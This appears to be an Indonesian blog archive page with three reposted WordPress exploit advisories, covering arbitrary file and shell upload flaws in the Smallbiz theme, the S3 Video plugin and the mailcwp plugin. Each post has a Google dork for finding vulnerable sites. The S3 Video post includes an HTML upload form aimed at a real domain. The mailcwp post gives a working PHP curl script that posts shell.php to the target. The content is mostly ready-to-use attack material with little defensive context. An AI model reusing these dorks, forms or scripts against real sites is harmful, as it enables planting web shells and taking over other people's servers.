Tampilkan postingan dengan label RemoteFile. Tampilkan semua postingan
Tampilkan postingan dengan label RemoteFile. Tampilkan semua postingan

Sabtu, 13 Februari 2016

WordPress Smallbiz Themes Remote File Uploads Vulnerability


#- Title: Wordpress Smallbiz Themes Remote File Uploads Vulnerability
#- Author: FullSecurity.org
#- Date: 09-02-2016
#- Developer : expand2web.com
#- Link Download : www.expand2web.com/smallbiz-theme/
#- Google Dork: inurl:"/themes/smallbiz/"
#- Fixed in Version : -
#- Tested on : Wessel
=======================================================
-- Proof Of Concept --

Vulnerability : site/wp-content/themes/smallbiz/palette/index.php

require("cpg.php");

if( $_GET['image'] ) // selected image from bookmark or get form
$file = $_GET['image'];

if( $_FILES['userfile']['tmp_name'] ) // Upload detected captain!
handle_upload();

When Vulnerable : 


Method :
1. Go to site.com/wp-content/themes/smallbiz/palette/index.php
2. Upload your image
3. if succes, click image & open in new tab


Jumat, 11 Desember 2015

WordPress Plugins S3 Video Remote Shell Upload


#- Title: WordPress Plugin S3 Video Remote Shell Upload
#- Author: Manish Kishan Tanwar AKA error1046
#- Date: 9/12/2015
#- Developer : Anthony Mills
#- Link Download : Wordpress. org/plugins/s3-video/
#- Google Dork: inurl:wp-content/plugins/s3-video/
#- Tested on : Win 8.1 RT
#- Fixed in Version : > 0.91
/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\

Vulrnerability : 
/wp-content/plugins/s3-video/includes/uploadify.php

Description : 
Wordpress plugins S3 Video is suffer from uploadify vulnerability remote attacker can upload file/shell/backdoor and exec commands or disclosure some local files.

Solution:
Upgrade new version of patch

-- Proof Of Concept --

You can use remote (xampp) , but i'd do simple way.. i will use csrf method.

Code : 
<form method=post action="http://www.3xploi7. com/wp-content/plugins/s3-video/includes/uploadify.php" enctype="multipart/form-data">
<input type=file name=Filedata> <input type=submit name=submit>


Shell Path : Here !!


Kamis, 17 September 2015

Wordpress Plugin mailcwp v1.99 Remote file upload


#- Title : Wordpress Plugin mailcwp v1.99 Remote file upload
#- Author : Larry W. Cashdollar, @_larry0
#- Vendor : vCadreWorks Pty Ltd
#- Download Site: wordpress.org/plugins/mailcwp/
#- Tested on : ubuntu
#- Date : 09/17/2015

Vulnerability :

2 $message_id = $_REQUEST["message_id"]; 
3 $upload_dir = $_REQUEST["upload_dir"];
.
8 $fileName = $_FILES["file"]["name"];
9 move_uploaded_file($_FILES["file"]["tmp_name"], "$upload_dir/$message_id-$fileName");

Proof of Concept : 

<?php
/*Larry W. Cashdollar @_larry0
Exploit for mailcwp v1.99 shell will be called 1-shell.php.
7/9/2015
*/
        $target_url = 'http://www.example.com/wp-content/plugins/mailcwp/mailcwp-upload.php?message_id=1&upload_dir=/usr/share/wordpress/wp-content/uploads';
        $file_name_with_full_path = '/var/www/shell.php';
 
        echo "POST to $target_url $file_name_with_full_path";
        $post = array('file' => 'shell.php','file'=>'@'.$file_name_with_full_path);
 
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_URL,$target_url);
        curl_setopt($ch, CURLOPT_POST,1);
        curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
        $result=curl_exec ($ch);
        curl_close ($ch);
        echo "<hr>";
        echo $result;
        echo "<hr>";
?>

*  Fixed in v1.110